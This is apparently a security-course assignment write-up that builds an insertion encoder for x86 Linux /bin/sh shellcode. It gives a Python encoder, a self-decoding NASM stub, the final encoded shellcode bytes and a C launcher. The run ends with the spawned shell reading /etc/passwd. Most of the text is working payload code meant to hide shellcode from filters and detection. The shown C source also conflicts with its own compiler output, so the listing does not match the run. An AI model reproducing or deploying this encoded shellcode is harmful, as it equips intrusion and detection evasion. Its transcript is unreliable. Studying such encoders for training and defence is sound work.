SecurityTube Linux Assembly Expert (SLAE) Assignment Writeups — \x04 Insertion Encoder Shellcode

objdump -d ./execve-stack |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'|sed 's/ /\\x/g'
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"
NOT(0x01) = NOT(0000 0001) = 1111 1110 = 0xfe
NOT(0x02) = NOT(0000 0010) = 1111 1101 = 0xfd
Shellcode Before Insertion: "\x31\xc0\x50..."
Shellcode After Insertion: "\x31\xfe\xc0\xfd\x50..."
$ cat insertion-encoder-generator.py 
#!/usr/bin/python
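# Python Insertion Encoder Generator
# Companion to insertion-decoder.nasm: emits <byte>,<NOT(n)> pairs, n = 1, 2, 3, ...

# Function performs an 8-bit bitwise NOT on a hex string such as "0x01".
#
# Args:
#     hexString: a hex literal string ("0x01"); values above 0xff are rejected
# Returns:
#     the one's complement as a hex string, e.g. "0x01" -> "0xfe"
# Raises:
#     ValueError: malformed input, or a value that does not fit in one byte
def not_bit(hexString):
    # int(..., 16) only parses; the original eval() would execute whatever
    # text it was handed, which is unsafe as soon as the input is not a literal
    num_to_not = int(hexString, 16)
    if not 0 <= num_to_not <= 0xff:
        raise ValueError('expected a single byte value, got %s' % hexString)
    # XOR with 0xff is the same as 255 - n for 0..255, but is a true byte NOT
    return hex(num_to_not ^ 0xff)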
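# Execve shellcode which runs /bin/sh
# (b"" prefix: a plain str in Python 2, bytes in Python 3, so bytearray()
# below accepts it under both interpreters)
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

# The matching decoder (insertion-decoder.nasm) tracks the read offset and
# the expected sequence value in 8-bit registers (al, cl), so insertion
# offsets past 0xff are unreachable: that caps the payload at 128 bytes.
MAX_PAYLOAD_LEN = 128
if len(shellcode) > MAX_PAYLOAD_LEN:
    raise ValueError('shellcode too long for the 8-bit decoder counters (max %d bytes)' % MAX_PAYLOAD_LEN)

# Initialising empty string and number
encoded = ""
num = 1

print('Encoded shellcode ...')
# Insert hex sequence 01, 02, 03 etc between bytes of shellcode, and perform
# bitwise NOT operation prior to inserting
for byte in bytearray(shellcode):
    hexInsert = not_bit("{0:#0{1}x}".format(num, 4))
    encoded += '0x%02x,' % byte
    encoded += hexInsert + ","
    num += 1

# Print encoded shellcode with 0xaa twice on end to denote end of shellcode.
# NOTE(review): the decoder stops at the first insertion byte whose NOT differs
# from the expected value; NOT(0xaa) = 0x55 = 85, so the marker is only
# unambiguous while the sequence never reaches 85 - verify before reusing.
print(encoded + "0xaa,0xaa")
print('Len: %d' % len(bytearray(shellcode)))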
$ ./insertion-encoder-generator.py 
Encoded shellcode ...
0x31,0xfe,0xc0,0xfd,0x50,0xfc,0x68,0xfb,0x2f,0xfa,0x2f,0xf9,0x73,0xf8,0x68,0xf7,0x68,0xf6,0x2f,0xf5,0x62,0xf4,0x69,0xf3,0x6e,0xf2,0x89,0xf1,0xe3,0xf0,0x50,0xef,0x89,0xee,0xe2,0xed,0x53,0xec,0x89,0xeb,0xe1,0xea,0xb0,0xe9,0x0b,0xe8,0xcd,0xe7,0x80,0xe6,0xaa,0xaa
Len: 25
; Filename: insertion-decoder.nasm
; Purpose: Decode encoded shellcode (insertion method using NOT and ascending hex number sequence)
;
; Input layout at EncodedShellcode (produced by insertion-encoder-generator.py):
;   byte0, NOT(1), byte1, NOT(2), byte2, NOT(3), ..., 0xaa
; The loop compacts the payload bytes in place over the start of the buffer
; and, once the NOT of an insertion byte no longer matches the expected
; sequence value, jumps to the now-decoded payload at EncodedShellcode.
;
; Register roles (32-bit Linux, no stack frame):
;   esi = base of the encoded buffer; also the destination of the decoded bytes
;   edi = write cursor (esi+1 on entry: esi[0] is already a payload byte)
;   eax = offset of the next insertion byte relative to esi (1, 3, 5, ...)
;   ecx = expected sequence value for that insertion byte (1, 2, 3, ...)
;   ebx = scratch for the byte under test / the byte being copied
;
; Limitations to be aware of:
;   - al and cl are 8-bit: the read offset wraps after 0xff, so payloads
;     longer than 128 bytes cannot be decoded by this stub.
;   - The loop ends on the first byte whose NOT differs from cl. NOT(0xaa) is
;     0x55 = 85, so the 0xaa marker would be misread as a valid insertion
;     byte if the expected value ever reaches 85 (a payload of 85 bytes).
;   - The stub overwrites its own bytes, which needs a mapping that is both
;     writable and executable (a W^X violation). Linked as a normal ELF the
;     .text section is read-only, so the standalone binary faults on the first
;     "mov byte [edi], bl" (the segmentation fault shown below); it only runs
;     from the writable code[] array in shellcode.c built with -z execstack.
global _start
section .text
_start:
jmp short call_shellcode ; jmp/call/pop: obtain the address of EncodedShellcode without an absolute address
setup_decoder:
pop esi ; esi = address of EncodedShellcode (the return address pushed by call)
lea edi, [esi +1] ; edi = esi + 1: first slot to overwrite, esi[0] is already a payload byte
xor eax, eax ; zero with xor rather than mov to avoid null bytes in the stub
xor ebx, ebx
xor ecx, ecx
mov al, 1 ; eax = offset of the first insertion byte
mov cl, 1 ; ecx = first expected sequence value
decoder:
mov bl, byte [esi + eax] ; bl = insertion byte at the current read offset
not bl ; undo the encoder's NOT
xor bl, cl ; bl ^= expected value; ZF is set only when they match
jnz short EncodedShellcode ; mismatch = end marker reached: run the decoded payload
inc cl ; next expected sequence value
mov bl, byte [esi + eax + 1] ; bl = payload byte that follows the insertion byte
mov byte [edi], bl ; store it at the write cursor (always behind the read position)
inc edi ; advance write cursor by one
add al, 2 ; advance read offset past the pair (8-bit: wraps after 0xff)
jmp short decoder
call_shellcode: call setup_decoder ; pushes the address of EncodedShellcode as the return address
EncodedShellcode: db 0x31,0xfe,0xc0,0xfd,0x50,0xfc,0x68,0xfb,0x2f,0xfa,0x2f,0xf9,0x73,0xf8,0x68,0xf7,0x68,0xf6,0x2f,0xf5,0x62,0xf4,0x69,0xf3,0x6e,0xf2,0x89,0xf1,0xe3,0xf0,0x50,0xef,0x89,0xee,0xe2,0xed,0x53,0xec,0x89,0xeb,0xe1,0xea,0xb0,0xe9,0x0b,0xe8,0xcd,0xe7,0x80,0xe6,0xaa,0xaa ; output of insertion-encoder-generator.py (payload pairs + 0xaa marker)
$ nasm -f elf32 -o insertion-decoder.o insertion-decoder.nasm
$ ld -o insertion-decoder insertion-decoder.o -m elf_i386
$ ./insertion-decoder
Segmentation fault (core dumped)
$ objdump -d ./insertion-decoder |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'|sed 's/ /\\x/g'
"\xeb\x24\x5e\x8d\x7e\x01\x31\xc0\x31\xdb\x31\xc9\xb0\x01\xb1\x01\x8a\x1c\x06\xf6\xd3\x30\xcb\x75\x12\xfe\xc1\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xea\xe8\xd7\xff\xff\xff\x31\xfe\xc0\xfd\x50\xfc\x68\xfb\x2f\xfa\x2f\xf9\x73\xf8\x68\xf7\x68\xf6\x2f\xf5\x62\xf4\x69\xf3\x6e\xf2\x89\xf1\xe3\xf0\x50\xef\x89\xee\xe2\xed\x53\xec\x89\xeb\xe1\xea\xb0\xe9\x0b\xe8\xcd\xe7\x80\xe6\xaa\xaa"
$ cat shellcode.c
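#include<stdio.h>
#include<string.h>

/*
 * Test harness for the decoder stub + encoded payload listed above.
 *
 * code[] is an initialised global, so it lives in the writable data segment;
 * the self-modifying decoder needs that, and -z execstack (see the build line
 * below) makes the segment executable as well. Without both, the first store
 * inside the decoder faults, as the standalone ELF did.
 *
 * Only one trailing 0xaa is kept: the decoder consumes a single marker byte.
 * The array's implicit NUL terminator is what strlen() stops at, which is why
 * the reported length equals the number of shellcode bytes.
 */
unsigned char code[] = \
"\xeb\x24\x5e\x8d\x7e\x01\x31\xc0\x31\xdb\x31\xc9\xb0\x01\xb1\x01\x8a\x1c\x06\xf6\xd3\x30\xcb\x75\x12\xfe\xc1\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xea\xe8\xd7\xff\xff\xff\x31\xfe\xc0\xfd\x50\xfc\x68\xfb\x2f\xfa\x2f\xf9\x73\xf8\x68\xf7\x68\xf6\x2f\xf5\x62\xf4\x69\xf3\x6e\xf2\x89\xf1\xe3\xf0\x50\xef\x89\xee\xe2\xed\x53\xec\x89\xeb\xe1\xea\xb0\xe9\x0b\xe8\xcd\xe7\x80\xe6\xaa";

/* Explicit return type: the bare "main()" produced the -Wimplicit-int warning */
int main(void)
{
	/* strlen() returns size_t, so %zu (not %d) is the matching conversion */
	printf("Shellcode Length: %zu\n", strlen(code));
	/* Transfer control to the decoder stub at the start of code[] */
	int (*ret)() = (int(*)())code;
	ret();
	return 0;
}
$ gcc -fno-stack-protector -z execstack -m32 -o shellcode shellcode.c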
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
main()
^~~~
$ ./shellcode
Shellcode Length: 94
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
